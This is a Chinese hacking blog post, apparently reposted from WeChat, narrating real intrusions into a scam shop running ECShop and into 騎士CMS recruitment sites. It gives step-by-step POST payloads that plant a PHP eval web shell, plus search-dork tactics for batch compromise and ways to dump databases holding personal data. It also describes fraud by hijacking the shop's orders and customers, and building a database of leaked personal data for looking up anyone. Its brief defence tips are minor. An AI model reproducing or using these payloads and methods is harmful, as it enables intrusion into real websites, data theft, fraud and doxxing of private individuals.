實戰黑客入侵 獲取隱私與防禦,寫在前面:圖片全部打碼,所涉及到的漏洞,均已告知網站管理員。
為了不對別人的業務造成影響,特地延遲發文。
實戰黑客入侵
沒什麼技術含量,三流技術水平就能做到本文的效果。
一)被騙的小粉絲
事情的起因很簡單,小女粉比較虛榮,買了個高仿手錶。
懂行的人都懂,高仿表並不便宜,價格普遍在千元以上。
買回來之後,表不走了,想退貨,但賣家只換不退,一來二去,被拉黑了。
哥哥瞅了一眼照片,妹子顏值不錯,色迷心竅,遂幫之。
第一步,先收集資料,打開網站任意頁面,觀察網址,一般能看出對方用了什麼程序。
http://xxxx.com/goods-12345.html
作為一個老司機,觀察網址的後半部分”goods-12345.html” ,猜測騙子網站應該用的是ecshop這套源碼。
新手可以使用在線指紋識別平台,查詢目標網站用的程序。
指紋查詢:http://whatweb.bugscaner.com/look/
查騙子網站的IP地址和機房信息。
在線查詢:ping.chinaz.com
IP地址沒變化,說明騙子網站沒有使用CDN。
IP地址是香港,大概率沒什麼防禦。
最後一步,收集此IP開放了哪些端口,每個端口都代表著一種服務,開放的端口越多,我們入侵的機會就越多。
隨便找個端口掃描軟件,輸入IP地址,開始掃描,成功得到目標IP的端口。
在瀏覽器輸入IP和端口號,看看有什麼反應。
從截圖能看出來,對方的服務器是linux系統,安裝了寶塔面板。
目前已知目標網站的程序源碼、真實IP地址、機房信息、主機系統、主機安裝的軟件,可以開搞了。
百度搜索“程序名+漏洞”,收集整理ecshop相關的一切漏洞信息!
ECShop <= 2.x/3.6.x/3.0.x 漏洞復現:
http://r3start.net/index.php/2018/09/04/146
ECShop全系列版本遠程代碼執行高危漏洞分析+實戰提權:
https://www.freebuf.com/column/185049.html
ECshop 支付寶插件,sql注入漏洞:
https://blog.csdn.net/u011721501/article/details/40342797
ECshop 漏洞合集:
https://www.seebug.org/appdir/ecshop
2.x/3.6.x/3.0.x 這幾個版本,2018年爆出高危漏洞,直接就能拿下網站管理權限。
《實戰黑客批量入侵輕鬆拿下1000個網站》無極領域這篇專門寫過,一鍵獲取各類購物網站的數據庫,有圖有真相。
下圖是ecshop的最新漏洞信息。
下圖是ecshop官網公佈的程序更新記錄。
2020.12.1,ecshopV4.1.0爆出個SQL注入漏洞。
2020.12.30,ecshop官方發布了升級補丁。
輕車熟路,十多分鐘時間,就拿到了所有想要的信息。
現在,只要知道騙子網站的版本,就能用相應的漏洞進行攻擊。
哥哥又使出了目測大法,這個網站實在是太醜了,猜測應該是舊版源碼,2.x 或3.6.x版本。
直接使用查到的漏洞硬上,詳細操作方法,上面的鏈接都有,不再贅述。
如圖,寶塔防火牆攔截了攻擊代碼…
百度搜索“繞過寶塔防火牆”,現成的方案,現學現賣,繞過防火牆,成功獲取網站權限。
下載騙子網站的源碼,發現有很多老弟入侵這個網站,但都被防火牆攔截了…
打開源碼的數據庫配置文件,找到若干明文密碼。
登陸網站後台,看看訂單列表頁,居然真的有人買…
還有很多人留言問怎麼購買…
這個網站採用貨到付款的形式發貨。
黑吃黑的方法有兩種:
截單法:監控對方的訂單,提前發貨,這樣便能截單,平均一單500元以上的利潤。
替換法:許多網站會留微信二維碼,讓客戶加微信諮詢,只需換成自己的二維碼,就能截取對方的客戶。
事了拂衣去,深藏功與名。
二)招聘網信息洩露
騎士CMS是一套招聘網站源碼,國內很多招聘網站都在用。
最近這套程序爆出漏洞,哥哥第一時間測試,現場極其慘烈。
漏洞分析:https://xz.aliyun.com/t/8520
大神的漏洞分析非常完整,但手段不夠犀利,其實有更簡單,更小白的入侵方式,3秒搞定一個網站。
既然已經知道這套源碼有漏洞,那麼只要找出使用這套源碼的招聘網站,就能批量入侵。
搜索神器fofa:https://fofa.so/
常規搜索引擎,用來搜索網頁內容。
fofa搜索引擎,可以從代碼層面搜索,能搜出所有使用特定代碼的網站,可惜是收費的,偶爾用一次,劃不來開會員。
作為一個老司機,不想花錢,就得動腦子。
先打開騎士CMS的官網,找到其演示網站,分析頁面特徵。
發現有個“HR工具箱”的頁面,平時在其他網站很少見到,應該算是一個特徵。
複製其中一段比較有代表性的文字,直接百度搜索,果然找到很多招聘網站。
連續嘗試多次,全部失敗… 哥哥一臉懵逼,哪裡做錯了?
後來發現,原來另一套招聘源碼“PHPyun”也有這個頁面,估計同行互相模仿…
看來得換個特徵,許多網址URL有各自的特點,點擊演示網站的各個頁面,找比較有代表性的URL。
接下來,使用搜索指令“inurl:XXXX”,查找相同URL的網站,如下圖。
這次找對了,這些網站全部是騎士CMS的源碼。
0.打開火狐瀏覽器,安裝插件“hackbar”。
1.打開目標網站。
2.按F12進入調試模式,點擊”hackbar“插件。
3.點擊“Load URL”加載要攻擊的網址。
4.手動給加載的網址末尾,加入代碼:
index.php?m=home&a=assign_resume_tpl
如:http:www.xxx.com/index.php?m = home&a = assign_resume_tpl
5.勾選“post data”選項,在出現的方框中輸入攻擊代碼,下面兩行,任意一個都行。
variable=1&tpl=<?php phpinfo();die();?>
variable=1&tpl=<?php phpinfo(); ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>
6. 點擊“Execute”,發送攻擊指令,如果出現上圖的“頁面錯誤”,證明存在漏洞。
7. 將上一步“Post data”中的代碼,換成如下代碼:
variable=1&tpl=./data/Runtime/Logs/Home/21_01_02.log
如果出現下圖的頁面,那麼此網站必然有漏洞。
變量= 1&tpl =。/ data / Runtime / Logs / Home / 21_01_01.log
代碼中“21_01_01”代表攻擊當天的時間。
如果是2021年1月6日,那麼攻擊時就要改成。
變量= 1&tpl =。/ data / Runtime / Logs / Home / 21_01_06.log
通過上面的步驟,我們僅僅只是驗證網站存在漏洞,接下來要開始獲取網站管理權限。
具體細節參考上面的第5步,換個攻擊代碼即可。
先在“Post data”的方框中輸入下面的攻擊代碼,點擊“Execute”,發送攻擊指令。
variable=1&tpl=<?php fputs(fopen("sys.php","w"),"<?php eval($_POST[5521]);?>")?>; ob_flush();?>
這個攻擊指令的意思是,在網站目錄創建一個名為“sys.php”文件,文件內容是一段木馬“<?php eval($_POST[5521]);?>”,木馬的密碼是5521。
然後,在方框中輸入上面第7步的代碼,點擊“Execute”,就能完成攻擊。
變量= 1&tpl =。/ data / Runtime / Logs / Home / 21_01_02.log
最後,使用“中國蟻劍”,就能進入網站內部。
中國蟻劍:
https://github.com/AntSwordProject/AntSword-Loader
添加木馬地址:www.xxxx.com/sys.php 密碼:5521
成功獲取多個招聘網站的權限,想進入網站數據庫,先要找到數據庫密碼。
百度搜索“騎士CMS 數據庫文件”,查到了文件路徑,然後從招聘網源碼,找到數據庫文件。
這個文件裡面有數據庫用戶名和密碼,我們用得到的密碼連接數據庫…
如下,是數據庫管理頁面,可以隨便查管理員/用戶的所有信息,圖中是管理員的密碼字段,可以一鍵導出所有數據。
整個過程可以實現全自動化,批量入侵,參考無極領域之前的文章。
順手給管理員發個郵件,通知對方網站存在漏洞。
三)灰色產業鏈
各類數據遍地都是,主要用途是營銷和詐騙。
你能想到的任何數據,都有人在暗網出售。
全國上億車主的信息。
400萬帶身份證姓名性別地址的信息。
全國知名大型招聘網站都被黑客搞過,數億份包含所有信息的簡歷全部洩露。
主流大型網站,數億份包含密碼的數據,全部洩露。
這一切,花點錢就能買到。
除了營銷外,這些數據還有個最大的功能:社工!
簡而言之,除非對方不上網,否則可以查到任何人的個人信息。
微博的噴子很多,順手就能查到對方的手機號…
Q群內也經常有人撕逼,順手就能查到對方的曾經用過的密碼、註冊過哪些網站…
很多平台都提供收費查詢,效果如下:
查詢畢竟要花錢,一些人會選擇自建社工庫,這樣就能無限隨便查任何人。
一台普通配置的電腦,配個大點的硬盤,將各種數據庫全部下載到硬盤。
安裝一款全文搜索軟件即可,可選的軟件很多AnyTXT 、BBdoc、filelocator、DocFetcher…
一鍵批量搜索硬盤的所有文件,可以穿透文檔,直接搜索文檔內部的文字,支持搜索TXT、Word、Excel、PPT、PDF、HTML…. 各種文件格式。
如此簡單,毫無技術含量。
四)防禦
網站盡量用大服務商的主機,阿里雲是真的厲害,能攔截大多數攻擊。
安全狗、D盾、寶塔都提供免費的防火牆,效果很好。
個人隱私洩露,這個是不可逆的,改掉你現在用的所有密碼,採用密碼分級制度,支付、社交、臨時…根據重要程度,分別用不同的密碼。
為了防止被社工,可以在網上發布一些假個人信息。
以上,能阻止大多數攻擊,普通個人做到這一步,就足夠了。
對大神來說,一切防禦都是笑話。
— 完 —
相比技術,黑客思路才是真正的寶藏。
刪了很多圖片和細節,以及敏感內容,確保能順利發布。
網絡不是法外之地,謹言慎行,不要造謠,尤其是噴子,很多時候別人只是懶得搭理,千萬別以為沒人給你治病。
公眾號:無極領域
本文转载自微信公眾號,原文链接:無極領域,本文观点不代表江湖人士立场,转载请联系原作者。